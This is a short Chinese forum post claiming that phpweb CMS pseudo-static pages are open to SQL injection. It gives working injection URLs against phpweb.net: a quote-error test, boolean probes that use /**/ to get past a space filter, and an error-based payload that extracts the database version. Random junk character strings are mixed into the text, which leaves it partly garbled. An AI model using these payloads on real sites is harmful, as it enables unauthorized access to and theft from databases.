phpweb所有的整站程序伪静态页面都存在sql注入
: X" d. R8 b- q* O1 I0 d5 L5 `3 R, i. i7 |0 |! m9 I& R
主站:http://phpweb.net/
% n8 i% e t" \# h% W加’检测:3 I$ w/ U% L. B; V2 i3 y) B
) r3 S6 D. l' F m. Hhttp://www.phpweb.net/down/html/?772′.html' m/ V2 b; e; Q) A; f% _
: S# j* H1 o/ h* A7 M! J% V
出错" r6 z7 [5 m4 _5 _
存在注入。
! l0 T5 e" t' ~不能用空格,只能用/*罗
3 i5 ^7 `. F; h1 Thttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
( K7 }. q& f7 J q0 t
7 g Q* p1 O1 Q1 O5 u/ jhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
1 r; A# f! J/ A; v0 W4 M爆数据库版本:
+ ]7 x4 h( l' Y d 3 i" ~+ K7 N1 l+ `4 y, b7 K4 h
?
8 X) z+ P$ @( ]! \- S# I7 g: u" Z* y1
, W; z4 d! l( G1 |- E& thttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html7 ]" S! b; X7 s3 R
更新日期: 2013-01-03 13:39:50
& l9 E8 f+ g3 i m( s! ]' ]7 T |
发表于 2013-1-4 19:46:42
收藏
支持
反对